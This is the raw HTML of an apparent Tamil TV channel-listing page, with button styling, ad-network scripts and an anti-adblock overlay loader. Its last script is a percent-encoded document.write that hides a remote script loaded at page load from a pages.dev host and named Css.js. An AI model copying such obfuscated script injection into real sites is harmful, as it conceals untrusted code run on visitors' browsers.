<!DOCTYPE html>
<html lang="en">
<head>
    <meta name="monetag" content="39145872aa5f6ab90fd6668d0d8a38c1">
  <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
      <title>tamil Tv Channel</title>				

        <style>

  *{
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  list-style: none;
  text-decoration: none;
  font-family: 'Montserrat';
}



body {
  background-color: #8098ff;
  margin-top: 2px;
  font-size: 16px;


}     


.container { 
font-weight: bold;  
width: 100px; 
height: 140px; 
position: relative;

} 


.card1 {
        width: 70px;
        height: 70px;
      position: relative;
        top:25px;



}


span {
        font-size: 13px;
        color: #000;
        display:inline-block;
        position: relative;
        top:30px;
}			

  figcaption{
        text-align: center;
}			


    .btn2 {
    margin: 5px;    
    border-radius: 10px;    
     padding: 0px; 
    text-align: center;
    border: 3px solid #8098ff;
    background-color: #fff;
    color: #102770;


  }

  .btn2:active,
  .btn2:focus,
  .btn2:hover{
   background-color: #20c0c0;
   color: #ffeba7;
   box-shadow: 0 0 0.20em 0.20em rgba(255,255,255);
   border: 3px solid gold;
   outline: none;
  }



    </style>
</head>
  <script type='text/javascript' src='//eltontry.com/09/f1/e9/09f1e956c711aea6a898d5abbb78d092.js'></script>

<body>

<style type='text/css'>
/* Animation */
@keyframes fadeInDown{0%{opacity:0;transform:translateY(-20px)}100%{opacity:1;transform:translateY(0)}}
@keyframes rubberBand{from{transform:scale3d(1,1,1)}30%{transform:scale3d(1.25,0.75,1)}40%{transform:scale3d(0.75,1.25,1)}50%{transform:scale3d(1.15,0.85,1)}65%{transform:scale3d(.95,1.05,1)}75%{transform:scale3d(1.05,.95,1)}to{transform:scale3d(1,1,1)}}
/* Say Hi to Adblock */
#arlinablock{background:rgba(0,0,0,0.65);position:fixed;margin:auto;left:0;right:0;top:0;bottom:0;overflow:auto;z-index:999999;animation:fadeInDown 1s}
#arlinablock .header{margin:0 0 15px 0}
#arlinablock .inner{background:#e3482d;color:#fff;box-shadow:0 5px 20px rgba(0,0,0,0.1);text-align:center;width:600px;padding:40px;border-radius:5px;margin:7% auto 2% auto;animation:rubberBand 1s}
#arlinablock button{padding:10px 20px;border:0;background:rgba(0,0,0,0.15);color:#fff;margin:20px 5px;cursor:pointer;transition:all .3s}
#arlinablock button:hover{background:rgba(0,0,0,0.35);color:#fff;outline:none}
#arlinablock button.active,#arlinablock button:hover.active{background:#fff;color:#222;outline:none}
#arlinablock .fixblock{background:#fff;text-align:left;color:#000;padding:20px;height:250px;overflow:auto;line-height:30px}
#arlinablock .fixblock div{display:none}
#arlinablock .fixblock div.active{display:block}
#arlinablock ol{margin-left:20px}
@media(max-width:768px){#arlinablock .inner{width:calc(100% - 20px);margin:10px auto;padding:15px}}
</style>
<script type='text/javascript'>
//<![CDATA[
// Say Hi to Adblock
function downloadJSAtOnload(){var e=document.createElement("script");e.src="https://cdn.jsdelivr.net/gh/Arlina-Design/quasar@master/arlinablock.js",document.body.appendChild(e)}window.addEventListener?window.addEventListener("load",downloadJSAtOnload,!1):window.attachEvent?window.attachEvent("onload",downloadJSAtOnload):window.onload=downloadJSAtOnload;
//]]>
</script>

<script type='text/javascript'>

$(document).ready(function() {$('img#closed').click(function(){$('#bl_banner').hide(90);});});

</script>

<div id='fixedban' style='width:100%;margin:auto;text-align:center;float:none;overflow:hidden;display:scroll;position:fixed;bottom:0;z-index:999;-webkit-transform:translateZ(0);'>

<div>


<a id='close-fixedban' onclick='document.getElementById("fixedban").style.display = "none";' style='cursor:pointer;'><img alt='close' src='  ' title='close button' style='vertical-align:middle;'/></a></div>


<div style='text-align:center;display:block;max-width:728px;height:auto;overflow:hidden;margin:auto'>


<script type="text/javascript">
  atOptions = {
    'key' : '701fef7de243c4e8e91e6e6b3a2fea1e',
    'format' : 'iframe',
    'height' : 90,
    'width' : 728,
    'params' : {}
  };
  document.write('<scr' + 'ipt type="text/javascript" src="//eltontry.com/701fef7de243c4e8e91e6e6b3a2fea1e/invoke.js"></scr' + 'ipt>');
</script>  <script type="text/javascript">
  atOptions = {
    'key' : '701fef7de243c4e8e91e6e6b3a2fea1e',
    'format' : 'iframe',
    'height' : 90,
    'width' : 728,
    'params' : {}
  };
  document.write('<scr' + 'ipt type="text/javascript" src="//eltontry.com/701fef7de243c4e8e91e6e6b3a2fea1e/invoke.js"></scr' + 'ipt>');
</script>



</div>

</div>


  <center id="buttonContainer">
    <!-- Buttons will be dynamically added here -->
  </center>


</body>
  <script>

    if (navigator.onLine) {
      console.log("You are online");
    } else {
      console.log("You are offline");
    }
  </script>

<script language="javascript">
document.write( unescape( '%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%64%69%67%69%74%61%6C%64%76%64%2E%70%61%67%65%73%2E%64%65%76%2F%6E%74%68%2F%56%74%68%2F%43%73%73%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E' ) );
</script>


</html>




